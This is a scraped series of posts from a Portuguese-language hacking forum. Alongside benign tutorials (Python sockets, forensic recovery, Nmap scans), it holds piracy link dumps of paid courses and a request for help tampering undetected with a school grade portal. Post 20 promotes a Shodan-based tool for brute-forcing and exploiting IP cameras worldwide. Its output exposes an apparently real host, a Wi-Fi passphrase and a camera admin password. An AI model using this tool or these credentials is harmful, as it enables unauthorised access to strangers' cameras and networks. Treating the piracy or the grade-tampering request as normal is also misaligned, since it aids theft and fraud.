`socket.settimeout(value)`: `socket.getaddrinfo(host, port[, family[, socktype[, proto[, flags]]]])` Este método socket converte os argumentos host e port em uma seqüência de cinco tuplas. Dê uma olhada no exemplo: ``` >>> socket.getaddrinfo('www.thapar.edu', 'http') [(2, 1, 6, '', ('220.227.15.49', 80)), (2, 2, 17, '', ('220.227.15.49', 80))] >>> ``` O 2 representa a família, 1 representa o tipo de socket, 6 representa o protocolo, ' ' representa o canonical name e ('220.227.15.49', 80) representa o endereço dos dois sockets. No entanto, este número é difícil de compreender. Navegue para onde estão seus arquivos de exemplos. Use o código a seguir para obter um resultado mais legível. `getadd1.py`: ``` import socket def get_protnumber(prefix): return dict( (getattr(socket, a), a) for a in dir(socket) if a.startswith(prefix)) proto_fam = get_protnumber('AF_') types = get_protnumber('SOCK_') protocols = get_protnumber('IPPROTO_') for res in socket.getaddrinfo('www.thapar.edu', 'http'): family, socktype, proto, canonname, sockaddr = res print('Family :', proto_fam[family]) print('Type :', types[socktype]) print('Protocol :', protocols[proto]) print('Canonical name :', canonname) print('Socket address :', sockaddr) print('--------------------------------------------') ``` image::http://i.imgur.com/k5Uus10.png[img7] A primeira parte do código faz um dicionário usando `AF_, SOCK_` e `IPPROTO_prefixes` que mapeia o número do protocolo para seus respectivos nomes. Este dicionário é formado pela técnica he list comprehension. O código dentro da função(get_protnumber(prefix)) do código acima pode parecer um pouco confusa, mas podemos executá-la separadamente da seguinte maneira: ``` >>> dict(( getattr(socket,n),n) for n in dir(socket) if n.startswith('AF_')) {0: 'AF_UNSPEC', 2: 'AF_INET', 6: 'AF_IPX', 11: 'AF_SNA', 12: 'AF_ DECnet', 16: 'AF_APPLETALK', 23: 'AF_INET6', 26: 'AF_IRDA'} ``` Agora ficou mais simples de entender. Esse código é geralmente usado para obter o número do protocolo: `for res in socket.getaddrinfo('www.thapar.edu', 'http'):` A linha de código anterior retorna os cinco valores, conforme discutido na definição. Esses valores são então combinados com seu dicionário correspondente.
  10. Olá meu nome é Alex Piccon sou novo no Forúm participo do Grupo no Facebook com nickname: Ellias Anderson, Estudo Tecnologia a 20 anos sou Graduado em Segurança da Informação, Pós Graduado em Gestão de Segurança da Informação e Atualmente estou me Graduado em Engenharia da Computação, sou certificado CEH, OSCP, ISO 27002 (Version old) e LPIC-1, trabalho com Segurança da Informação a mais de 10 anos atualmente estou no nível Hierárquico Sênior e Trabalho como Pentest nas horas vagas, vim aqui no Forúm para ajudar e aprender com vocês então qualquer dúvida sobre a área de Segurança da Informação estou a disposição e quem quiser me dar dicas sobre Programming estou aceitando ASS: Alex Piccon
  11. um simples video para quem e iniciante e tem duvidas sobre ataques em rede externa. como acontece e como abrir as portas
  12. Após um grupo de pesquisadores de segurança revelar falhas em processadores de computadores e smartphones, empresas de tecnologia correram para liberar soluções que contornem o problema. Essas brechas deixam bilhões de aparelhos conectados vulneráveis a ataques hacker.
  13. Se voce pode me ajudar, e se interressa sobre tais coisas aqui está um video meu para me dar uma força obrigado !
  14. Apostilas de Segurança, Segurança da informação, Anonimato na internet, Firewall, Criptografia, e etc. Aula de seguranca.pdf firewall proteçãp.pdf firewall tuto basico.pdf Fundamentos de sistemas de segurança da informaçao.pdf Gestão de Segurança da Informação.pdf Tutorial como ficar invisível.pdf Técnicas Hacker soluções para segurança 1.pdf Técnicas Hacker soluções para segurança 2.pdf Sua Rede Wireless é Realmente Segura.pdf Sistema para identificar invasão.pdf Segurança Ofensiva.pdf Introdução à Segurança da Informação.pdf Manual da Segurança da Informação.pdf extensoes_seguranca_DNS.pdf
  15. Comecei a treina CTF no site da Shellter Labs e surgiu uma duvida no Nivel "Admin-oculto". Já encontrei o link no código font. esse mesmo código verifiquei o User-agent e encontrei Admin-login, modifiquei o Admin de False para True só que não acontece nada. Já estou a duas semanas quebrando a cabeça para descobri qual e a reposta de CTF. Alguém poderia me da o norte para sabe o que estou fazendo de errado.
  16. olá pessoa hoje venho mostrar como recuperar dados com softwares específicos para área de forense . vamos utilizar os seguintes softwares: Autopsy // proximo tutorial FTK imager OSFmount Mini tool power data recovery lembrando que os softwares citados são todos freeware ou seja free. vamos usar um pendrive que tinha algumas imagens e então formatei para fazer a recuperação em seguida vamos fazer copias do mesmo para não corromper os arquivos no dispositivo original e assim diminuindo as chances da recuperação é ai que entra o FTK imager a função deste software é copiar byte por byte e criar uma imagem... Depois selecione a partição logica e seu pendrive Depois click em ADD Aqui você ira escolher o formato que deseja salvar, vamos usar E01 Aqui é apenas para por o nome numero do caso entre outras especificações Aqui iremos escolher onde salvar o arquivo dar o nome a ele no caso tutorial como na imagem abaixo Deixe igual a imagem as configurações e FINISH depois em START So aguarda Depois disso será criado dois arquivos o da imagem e um arquivo.txt que contem os dados e a hash Que são muito utilizadas para comparação no caso para comprovar autenticidade do arquivo. Agora vamos injeta o pendrive e emular a imagem com o programa OSFmount aqui é bem simples você clica em Mount new seleciona onde esta a imagem.E01 como o print acima e Ok o programa ira montar o pen drive exatamente como o original Agora aqui que entra o mini tool data recovery Selecione a imagem montada e click em FULL SCAN Voala Então pessoal é isso espero que ajude vocês vou parar por aqui que já ficou muito grande esse tutorial e se quiserem ver como usa o autopsy eu faço um tutorial mostrando sobre ele vlw fui
  17. Fala ae hackudões, Wheezy novamente aqui com mais um post ^^ Muito material para estudos abaixo: [Alura] Big Data: Uma introdução a data analysis na prática --> https://mega.nz/#F!w0lE0CwJ!0C8jJ6gk-NnnhgCFHNTPjQ [Alura] Carreira Desenvolvedor Wordpress --> https://mega.nz/#F!I5dnjbLI!5PxZWKAGBszv1e6YS4tobw [Alura] Carreira PHP Júnior --> https://mega.nz/#F!go9yFJgY!Rc-ldt4r97ORQ3ab9mxpNQ [Alura] Curso Alura Ruby --> https://mega.nz/#F!Z8snUS7R!5lVTwqJpbzwAUJ7TMWJviQ [Alura] Docker na Prática --> https://mega.nz/#F!ktEyEbCb!bmHtvmcu8Nxe30wxDj40fw [Alura] Git: Controle e compartilhe seu código --> https://mega.nz/#F!UxdkGDzK!1mcrvVlzovSy4ZmBsjDVfw [Alura] MySQL II: Consultas poderosas --> https://mega.nz/#F!kgNkSYBZ!9v_7xpNu13VBVnR5OdDHjA [Alura] Photoshop para web I --> https://mega.nz/#F!hokxDCQL!_mW8hP9Qr8nl1_BJmbbgMw Cursos de Automação Front-end --> https://mega.nz/#F!x0kikKTJ!_StsskBfe3-zXtP8dQmgqQ Cursos de Frameworks MVC --> https://mega.nz/#F!FsFHnAxb!0HKyxSkFE-eKc_MAUuptWg Cursos de HTML e CSS --> https://mega.nz/#F!AwMgCDYL!GvRevuoSD4Il6KIWnsPhUA Cursos de JavaScript --> https://mega.nz/#F!shcSBJgQ!F-gR-ISvycxwW1DTzvfa9g Cursos de JQuery --> https://mega.nz/#F!g8knHQpA!0Q9D4L9PIYH4DKVPbl04oA Trilha Agilidade --> https://mega.nz/#F!xtsykA6B!O0Bwb8Js5q7W11Edtee2mQ Trilha Android --> https://mega.nz/#F!0xMGFBaK!tT3HTPLBkfdvRrw412OWXw Trilha C# e .NET --> https://mega.nz/#F!AoETxB6R!vLWLYCDb3-YgaRu9AzMP8A Trilha HTML e Front End --> https://mega.nz/#F!B4thnQqD!hfMguutJ7noa_F3KHOn6zA Trilha Infraestrutura --> https://mega.nz/#F!l8t3DJCT!BXcIc1Kqw0XlnQt_3thQzg Trilha Java --> https://mega.nz/#F!Up813YJB!2LHj7dhdPoA6xEsbix643g Trilha Java Avancado --> https://mega.nz/#F!s40xyD5Q!ZB3XJaJD-Hqux2QrLNcX6w Trilha Java para Web --> https://mega.nz/#F!U1FzjTAL!u7JW1V48PCYvT84f1wxkfA Trilha PHP --> https://mega.nz/#F!stsnmBrC!gqyNUwozV-yHUYCQf22pHw Trilha Ruby e Rails --> https://mega.nz/#F!x0tQQBrJ!3WF1GuxYgff3B06hOL4gTw Trilha Testes de Software --> https://mega.nz/#F!wtthUJza!oLLUrewy5pn2LJexaIxk4w http://computeirodadepressao.com/quase-2tb-terabytes-em-cursos-de-ti-para-download-o-computeiro-pirou/ THE BEST: https://mega.nz/#F!wVsCjS7A!K7jrAMW6b7RX_AC6TT3msA!EUFTxKiR http://cursos.escolalinux.com.br/curso/introducao-a-programacao-java-14-horas?ref=B4887343E Especiais ^^ 1-https://mega.nz/#F!KIRE3DDS!RSwncUf5rVV_RZ_GLu-ccA!GYgRDYIT ***************************************************************************** https://mega.nz/#F!g0ozSBYa!aAqiyDHhwltAz9Du-niZSA https://mega.nz/#F!w1hGTCBT!lXFEwX-9PwKinuIUqCFn4Q ***************************************************************************************** https://mega.nz/#F!tBYmySLR!6MYhJPB0T3xh8WjjH0H18w!4ERQTQ5K https://mega.nz/#F!ABomHbSC!8ueqTOFFddwTXrz09aKDWA **************************************************************************************** Curso Hacking https://mega.nz/#F!vVoUhSrY!CCRwM3BC7U31BaAFZHl5SQ ***************************************************************************** By: Wheezy BONS ESTUDOS!!
  18. invade

    (INICIAR) Hacking

    Sou iniciante nesse campo (Hacking) mas, com relação à programação já estou bem introduzido e sei algumas linguagens. Queria saber por onde começar nesse área. Oque devo saber, pois estou perdido diante de tantas coisas que vejo. Devo estudar oque no começo ? redes? Linux? Alguém me esclareça , ficarei muito grato.
  19. ? Principais sites de notícias ? Brasileiros: tecnoblog.net tecmundo.com.br pplware.sapo.pt hackersportugal.com imasters.com.br hackersec.com hardwaremagazine.com.br oanalista.com.br baboo.com.br onsecure.wordpress.com motherboard.vice.com Americanos: thehackernews.com threatpost.com medium.freecodecamp.com hshrzd.wordpress.com n0where.net nccgroup.trust theregister.co.uk 0x00sec.org h.phys.org theintercept.com By Wheezy ^^
  20. Criei essa ferramenta integrada com um mecanismo de pesquisa de dispositivos conectados à Internet chamada shodan para pesquisar câmeras conectadas a internet, e por fim obter acesso á centenas de milhares de câmeras ao redor do mundo por exemplo Hong Kong, Tokyo, Russia, EUA, Coreia do Sul, Irã entre outros. Github https://github.com/fbctf/shodanwave Shadonwave Shodanwave é uma ferramenta para explorar e obter informações de câmeras especificamente da câmera IP Netwave. A ferramenta usa um mecanismo de busca chamado shodan que facilita a busca de câmeras on-line, mas não só isso. Hack câmeras de rede ao redor do mundo, muito divertido! Para que serve a ferramenta? Olhe, uma lista! Search Brute force SSID and WPAPSK Password Disclosure Exploit Aqui está um exemplo do shodanwave rodando ...... Uso: python shodanwave.py -u usernames.txt -w passwords.txt -k Shodan API key python shodanwave.py --help __ __ _____/ /_ ____ ____/ /___ _____ _ ______ __ _____ / ___/ __ \/ __ \/ __ / __ `/ __ \ | /| / / __ `/ | / / _ \ (__ ) / / / /_/ / /_/ / /_/ / / / / |/ |/ / /_/ /| |/ / __/ /____/_/ /_/\____/\__,_/\__,_/_/ /_/|__/|__/\__,_/ |___/\___/ This tool is successfully connected to shodan service Information the use of this tool is illegal, not bad. [+] Shodan successfully Connected. [+] Shodan Exploit Enabled. [+] Netwave IP Camera Found: 111307 [+] Passwords loaded: 12 [!] Disable password discovery module? (S/n): N [+] Launching brute force on host http://186.193.55.18:8080 [!] Password not found [!] Getting System Information [!] Getting Wireless System Information [+] Mac address found E8ABFA1A9374 [+] Host: http://186.193.55.18:8080 [+] Country: n/a [+] Organization: Nettel Telecomunicações Ltda. [+] Product: Netwave IP camera http config [+] SSID: moslekok [+] WPAPSK: TulSokanLoptatok [+] Starting to read memory dump.. this could take a few minutes [+] CTRL+C to exit.. [+] Binary data: 70560 [+] Strings in binary data found.. password should be around line 10000 10108 [+] Mac address triggered.. printing the following dumps, could leak username and passwords.. [+] Firstline... CAMERA2 [+] Possible username: admin [+] Possible password: ac00310 [+] Following line.. Requisitos de Instalação pip install -r /path/to/requirements.txt Referências: Shodan API search engine for Internet-connected devices. Requests Requests: HTTP for Humans Netwave Exploit Netwave IP Camera - Password Disclosure
  21. Coé rapaziada! Vim aqui trazer para o grupo uma pasta que eu encontrei pela net com muita coisa relacionada ao hacking e programação acredito que servirá bem a todos! https://mega.nz/#F!t5dgiZJI!_DR5DXsaeKg15HP9tsT8Nw
  22. Tipos de ataques virtuais efetuados por crackers. Pasta para download com 58 arquivos .TXT com diversos tipos de ataques e explicações sobre o mesmo (O arquivo vai estar como RAR, extraia e dentro vai estar a pasta "Tipos de ataques" com os itens dentro). Tipos de Ataque.rar
  23. Angel Olinda

    Invasão

    Bom... Tenho uma dúvida. Sou novato nessa área de "HACKING". E eu meio que tenho um desafio, que é, onde eu tenho + ou - 2 meses que é o dia que são liberados as notas no site da minha escola. E quero dicas do que aprender para brincar com o portal das notas no dia do lançamento... E óbvio sem ser descoberto. ~ Dicas - O Que aprender? - Qual sistema usar? - O que fazer? Att: Obg.
  24. Recon Dog é uma ferramenta completa em todas as suas necessidades básicas de coleta de informações. Ele usa APIs para reunir todas as informações para que sua identidade não seja exposta. Baixar e executar o Recon Dog: Digite o seguinte comando no terminal para fazer o download: --> git clone https://github.com/UltimateHackers/ReconDog Depois de baixar o programa, digite o seguinte comando para navegar até o diretório Recon Dog e listar o conteúdo --> cd ReconDog && ls Agora execute o script com o seguinte comando. --> python dog.py fonte:http://www.kitploit.com/2017/07/recondog-all-in-one-tool-for-all-your.html
  25. Bom dia, boa tarde, boa noite! Hoje temos um tutorial de como achar ips conectados na sua rede e indentificar os sistemas operacionais que rodam nos mesmos! Vou estar utilizando o Nmap para tal façanha. Vamos começar. [email protected]# nmap -sP 192.168.0.1-255 | grep 192 | cut -d ' ' -f 5 > ips.txt [email protected]# nmap -O -iL ips.txt Pronto, vc descobriu os hosts e os sistemas, mas vc sabe o que faz cada comando? Veja abaixo :v nmap Ele chama o programa nmap. -sP ele vai fazer um ping scan, ou seja ele vai pingar o ip selecionado para ver se esta ativo ou não! 192.168.0.1-255 Aki eh sua faixa de rede, mas isso vai depender de cada rede, pode ser 192.168.1.1 por exemplo, mas o que eu quero explicar aki é a parte do 1-255, isso vai fazer com q o ping scan percorra da faixa 192.168.0.1 até 192.168.0.255,resumindo vai percorrer toda essa faixa de rede e fazer um ping nela. Sem o resto dos comandos ficaria mais ou menos assim. Pronto, achamos os ips da rede, mas tem coisa q nós n vamos usar, entao vamos para os outros comandos! | Quando vc coloca | no terminal ele concatena um comando de outro programa no resto dos comandos! grep ele filtra a linha em q tem a palavra chave, no caso 192. Ficaria mais ou menos assim. ja estamos proximos do final, mas vamos filtrar mais um pouco! cut o cut, ele corta as palavras, por exemplo abacaxi, laranja, uesli com outros parametros vc escolhe a palavra q quer, e só ela aparecerá -d aki vc coloca o que esta separando as palavras ou frase, no caso espaços, entao: ' ', (o que estiver separando, deve estar em aspas) -f aki colocamos qual coluna esta a palavra q vc quer, colocamos q o q esta separando sao espaços, aki colocamos dps de quantos espaços está nossa palavra! sao 4, mas coloque 5, dps pesquisem pq... > joga para algum arquivo, no caso ips.txt (se n existir ele cria) pronto temos uma lista com todos os ips da sua rede! [email protected]# nmap -O -iL ips.txt Agora vamos descobrir os sistemas operacionais! -O chama a função de descobrir o Sistema operacional -iL permite que chamamos uma lista para fazer um scan de varios ips ao mesmo tempo (por isso tivemos que fazer tudo isso a cima), logo passamos a lista q criamos! E deve resultar nisso. as portas e o sistema operacional de todos os ips que sejam maquinas.
×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.